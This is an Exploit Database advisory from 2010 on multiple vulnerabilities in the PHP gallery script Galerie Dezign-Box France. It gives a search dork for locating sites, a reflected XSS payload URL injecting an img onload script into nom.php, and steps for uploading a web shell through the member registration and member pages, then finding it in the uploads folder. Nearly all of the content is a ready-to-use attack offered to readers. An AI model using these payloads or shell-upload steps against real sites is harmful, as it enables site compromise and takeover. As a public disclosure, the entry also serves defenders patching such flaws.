Galerie Dezign-Box France – Multiple Vulnerabilities

• Exploit Database
• 95 阅读

• 作者： indoushka
  日期： 2010-02-22
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/11523/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28

  ======================================================================================== | # Title: Galerie Dezign-Box © France Multi Vulnerability | # Author : indoushka | # email: indoushka@hotmail.com | # Home : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860) | # Web Site : www.iq-ty.com | # Dork : Script créé par Funewik - Dezign-Box © France | # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu) | # Bug: Multi ======================Exploit By indoushka ================================= # Exploit: 1- XSS http://server/galerie/nom.php?id=tufgxab0x2r4xybg527w&nom=<img+src=http://server/dt.gif+onload=alert(213771818860)>   2- Upload Shell http://server/galerie/membre/register.php (you Can Upload your Evil) http://server/galerie/membre/membres.php(you Can Upload your Evil) http://server/galerie/membre/uploads/ (2 find what you upload) ================================ Dz-Ghost Team ======================================== Greetz : ÓíÏí ÈáÚÈÇÓ + Úíä ÇáÈÑÏ + ÔáÛæã ÇáÚíÏ K10 + K@MEL + Úíä ãáíáÉ + ÊÛäíÝ -------------------------------------------------------------------------------------------